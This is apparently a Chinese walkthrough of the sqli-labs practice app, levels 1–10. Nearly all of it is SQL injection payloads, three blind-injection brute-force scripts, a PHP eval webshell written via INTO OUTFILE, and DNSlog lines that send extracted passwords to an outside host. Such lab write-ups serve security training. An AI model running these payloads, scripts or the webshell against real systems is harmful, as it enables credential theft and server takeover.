Less-1(字符型)

1
2
3
4
5
?id=1   正常
?id=1'  报错
?id=1' and 1=1--+ 正常
?id=1' and 1=2--+ 报错
判断是字符型注入,闭合方式是'
1
2
3
4
5
6
?id=1'order by 3--+  判断出回显位置3个
?id=-1' union select 1,2,3--+   判断三个回显位置
?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+   爆出数据库名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 字段名
?id=-1' union select 1,2,group_concat(concat_ws('|',username,password)) from users--+  爆出字段名

Less-2(数字型)

1
2
3
4
5
?id=1   正常
?id=1'  报错
?id=1 and 1=1--+ 正常
?id=1 and 1=2--+ 报错
判断是数字型注入
1
2
3
4
5
6
?id=1 order by 3--+  判断出回显位置3个
?id=-1 union select 1,2,3--+   判断三个回显位置
?id=-1 union select 1,version(),database() --+   爆出数据库名
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+  字段名
?id=-1 union select 1,2,group_concat(concat_ws('|',username,password)) from users--+  爆出字段名

Less-3/4(闭合方式与1/2不同)

Less-3闭合方式为:’)

Less-4闭合方式为:”)

1
2
3
4
5
6
7
8
9
10
11
12
?id=1   正常
?id=1'  报错
?id=1' and 1=1--+ 报错
?id=1') and 1=1--+ 正常
?id=1') and 1=2--+ 报错
判断是字符型型注入,且闭合方式为')
?id=1') order by 3--+  判断出回显位置3个
?id=-1') union select 1,2,3--+   判断三个回显位置
?id=-1') union select 1,version(),database() --+   爆出数据库名
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ 爆表名
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+  字段名
?id=-1') union select 1,2,group_concat(concat_ws('|',username,password)) from users--+  爆出字段名

Less-5/6(报错注入、盲注)

Less-5为’闭合

Less-6为”闭合

1
2
3
4
5
?id=1' 报错''1" LIMIT 0,1',去掉两边单引号后是'闭合
?id=1' and 1=1--+  正常
?id=1' and 1=2--+  报错
?id=1' order by 3--+  无回显
数据正误影响页面显示,可以选择报错注入或者盲注

报错注入:

  • updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML的内容,第二个参数:是需要update的位置XPATH路径, 第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,不符合就会报错
1
2
3
4
5
6
7
8
9
10
?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(database()) from information_schema.schemata)),1)) --+ //数据库名

?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)) --+ //表名

?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)) --+注意:这个需要数据库名和表名

//获取字段
?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(username) from users)),1)) --+
?id=1' and 1=(updatexml(1,concat(0x3a,(select group_concat(password) from users)),1)) --+
?id=1' and updatexml(1,concat(0x3a,(select concat_ws(':',username,password) from users LIMIT 0,1))--+
  • floor报错
1
2
3
4
5
6
7
8
9
10
11
?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(database())))--+ 查数据库

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select table_name from information_schema.tables where table_schema='security' limit 3,1)))--+查表名

?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+ 字段名

查看有多少行数据:
?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select count(username) from users)))--+

利用limit一个一个输出:
?id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x23,(select username from users limit 0,1)))--+
  • extractvalue报错
1
2
3
4
?id=1' and extractvalue(1,concat(0x23,database(),0x23))--+ 数据库名
?id=1' and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+ 表名
?id=1' and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x23))--+ 字段名
?id=1' and extractvalue(1,concat(0x23,(select username from users limit 0,1),0x23))--+ 获取字段

布尔盲注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import requests
from multiprocessing import Pool

# 只需要修改url 和 两个payload即可
# 目标网址(不带参数)
url = "http://192.168.235.133:86/less-5/"
# 猜解长度使用的payload
payload_len = "?id=1' and length((select database())) = {n} -- +"
# payload_len = "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database())) = {n} -- +" # 爆破表名n为长度,r为字符的ascii值
# payload_len = "?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) = {n} -- +" # 爆破字段名n为长度,r为字符的ascii值
# payload_len = "?id=1' and length((select group_concat(concat_ws('|',username,password)) from users)) = {n} -- +" # 爆破用户名和密码n为长度,r为字符的ascii值

# 枚举字符使用的payload
payload_str = "?id=1' and ascii(substr((select database()),{n},1)) = {r} -- +"
# payload_str = "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{n},1)) = {r} -- +"  # 爆破表名n为长度,r为字符的ascii值
# payload_str = "?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{n},1)) = {r} -- +" # 爆破字段名n为长度,r为字符的ascii值
# payload_str = "?id=1' and ascii(substr((select group_concat(concat_ws('|',username,password)) from users),{n},1)) = {r} -- +" # 爆破用户名和密码n为长度,r为字符的ascii值
# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n=length))
        # 页面中出现"You are in"则表示成功
        if 'You are in...........' in response.text:
            print('测试长度完成,长度为:', length,)
            return length
        else:
            print('正在测试长度:', length)
            length += 1  # 测试长度递增

# 获取字符
def getChar(args):
    url, payload, l, n = args
    response = requests.get(url=url + payload_str.format(n=l, r=n))
    # 页面中出现此内容则表示成功
    if 'You are in...........' in response.text:
        return chr(n)

# 开始猜解
def main():
    length = getLength(url, payload_len)
    print('开始猜解字符.........')
    str = ''
    for l in range(1, length + 1):
        pool = Pool(processes=50)  # 设置并发数
        results = pool.map(getChar, [(url, payload_str, l, n) for n in range(33, 126)])
        pool.close()
        pool.join()
        char = next((c for c in results if c is not None), None)
        if char:
            str += char
            print('第', l, '个字符猜解成功:', str)
    return str

if __name__ == "__main__":
    main()

Less-7(文件操作)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
?id=1'  报错
?id=1"  正常
说明闭合方式是'开头
?id=1')  报错
?id=1') and 1=1--+  报错
?id=1')) 报错
?id=1')) and 1=1--+   正常
说明'))为正确闭合方式

?id=1')) order by 3--+  回显位为3
?id=1')) union select 1,2,3--+ 只回显You are in.... Use outfile......,显注不能用,布尔盲注可以使用,但这次使用outfile


Outfile注入:
?id=-1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php" --+
蚁剑连接即可


DNSlog注入:
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.hexlhblwkt.dgrh3.cn\\abc')),2,3--+  查数据库名
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(group_concat(table_name)) from information_schema.tables where table_schema='security'),'.hexlhblwkt.dgrh3.cn\\abc')),2,3--+  爆出表名
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(group_concat(column_name)) from information_schema.columns where table_schema='security' and table_name='users'),'.hexlhblwkt.dgrh3.cn\\abc')),2,3--+  字段名
?id=-1')) union SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password from users limit 3,1),'.coqwyhcrob.dgrh3.cn\\abc')),2,3--+  爆出字段,只能一个一个爆

Less-8(布尔盲注)

1
2
3
4
5
6
7
?id=1' 报错
?id=1' and 1=1--+  正常
?id=1' and 1=2--+  报错
判断闭合方式为'

可以用DNSlog外带或者写文件
本次使用布尔盲注

布尔盲注脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import requests
from multiprocessing import Pool

# 只需要修改url 和 两个payload即可
# 目标网址(不带参数)
url = "http://192.168.235.133:86/less-8/"
# 猜解长度使用的payload
payload_len = "?id=1' and length((select database())) = {n} -- +"
# payload_len = "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database())) = {n} -- +" # 爆破表名n为长度,r为字符的ascii值
# payload_len = "?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) = {n} -- +" # 爆破字段名n为长度,r为字符的ascii值
# payload_len = "?id=1' and length((select group_concat(concat_ws('|',username,password)) from users)) = {n} -- +" # 爆破用户名和密码n为长度,r为字符的ascii值

# 枚举字符使用的payload
payload_str = "?id=1' and ascii(substr((select database()),{n},1)) = {r} -- +"
# payload_str = "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{n},1)) = {r} -- +"  # 爆破表名n为长度,r为字符的ascii值
# payload_str = "?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{n},1)) = {r} -- +" # 爆破字段名n为长度,r为字符的ascii值
# payload_str = "?id=1' and ascii(substr((select group_concat(concat_ws('|',username,password)) from users),{n},1)) = {r} -- +" # 爆破用户名和密码n为长度,r为字符的ascii值
# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n=length))
        # 页面中出现"You are in"则表示成功
        if 'You are in...........' in response.text:
            print('测试长度完成,长度为:', length,)
            return length
        else:
            print('正在测试长度:', length)
            length += 1  # 测试长度递增

# 获取字符
def getChar(args):
    url, payload, l, n = args
    response = requests.get(url=url + payload_str.format(n=l, r=n))
    # 页面中出现此内容则表示成功
    if 'You are in...........' in response.text:
        return chr(n)

# 开始猜解
def main():
    length = getLength(url, payload_len)
    print('开始猜解字符.........')
    str = ''
    for l in range(1, length + 1):
        pool = Pool(processes=50)  # 设置并发数
        results = pool.map(getChar, [(url, payload_str, l, n) for n in range(33, 126)])
        pool.close()
        pool.join()
        char = next((c for c in results if c is not None), None)
        if char:
            str += char
            print('第', l, '个字符猜解成功:', str)
    return str

if __name__ == "__main__":
    main()

Less-9/10(时间盲注)

Less-9 单引号闭合

Less-10 双引号闭合

1
2
3
4
5
6
?id=1' and sleep(3) --+          有明显延迟
?id=1" and sleep(3) --+          无延迟
?id=1') and sleep(3) --+         无延迟

说明这里的闭合是单引号。  
时间盲注语句:SELECT * FROM users WHERE id=1 AND IF(ASCII(SUBSTR(USER(),1,1))>65 ,SLEEP(5),1);

直接上脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import requests
import threading
 

url = "http://192.168.235.133:86/Less-9/?id="

# 控制最大线程数的Semaphore
max_threads = 10
thread_semaphore = threading.Semaphore(max_threads)

# 枚举长度使用的payload
payload_len = "1' and if(length(database())={},sleep(2),1)-- +"
# payload_len = 'admin\' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=\'security\')) = {},sleep(2),1) -- +' # 爆破表名长度
# payload_len = 'admin\" and if(length((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")) = {},sleep(2),1) -- +' # 爆破字段名长度
# payload_len = 'admin\' and if(length((select group_concat(username)) from users)) = {},sleep(2),1) -- +' # 爆破用户名和密码长度

# 枚举字符使用的payload
payload_str = "1' and if(ascii(substr(database(),{i},1))={mid},sleep(2),1)-- +"
# payload_str = 'admin\' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\'security\'),{i},1)) = {mid},sleep(3),1) -- +' # 爆破表名
# payload_str = 'admin\" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),{i},1)) = {mid},sleep(3),1) -- +' # 爆破字段名
# payload_str = 'admin\' and if(ascii(substr((select group_concat(username)) from users),{i},1)) = {mid},sleep(3),1) -- +' # 爆破用户名和密码


# 获取长度
def get_length(payload_len):
    length = 1
    while True:
        try:
            payload = url + payload_len.format(length)
            response = requests.get(payload)
            if response.elapsed.total_seconds() > 2:
                return length
            length += 1
            print("当前测试长度为:", length)
        except requests.RequestException as e:
            print("网络请求异常:", e)
            return

# 获取单个字符
def get_char(i, result):
    with thread_semaphore:
        for mid in range(32, 127):
            try:
                payload = url + payload_str.format(i=i, mid=mid)
                response = requests.get(payload)
                if response.elapsed.total_seconds() > 3:
                    print(f"第{i}个字符为:", chr(mid))
                    with threadLock:
                        result[i-1] = chr(mid)
                    return
            except requests.RequestException as e:
                print("网络请求异常:", e)
                return
            finally:
                # 释放信号量
                thread_semaphore.release()

# 主程序
if __name__ == "__main__":
    print('开始猜解长度...')
    length = get_length(payload_len)
    if length is not None:
        print('长度为:', length)
        print('开始猜解字符...')
        result = [''] * length
        threadLock = threading.Lock()  # 创建线程锁

        threads = []
        for i in range(1, length + 1):
            thread = threading.Thread(target=get_char, args=(i, result))
            threads.append(thread)
            thread.start()

        for t in threads:
            t.join()

        result_str = ''.join(result)
        if '' not in result:
            print('猜解字符结果:', result_str)
        else:
            print('字符获取不完整。')
    else:
        print('无法获取长度。')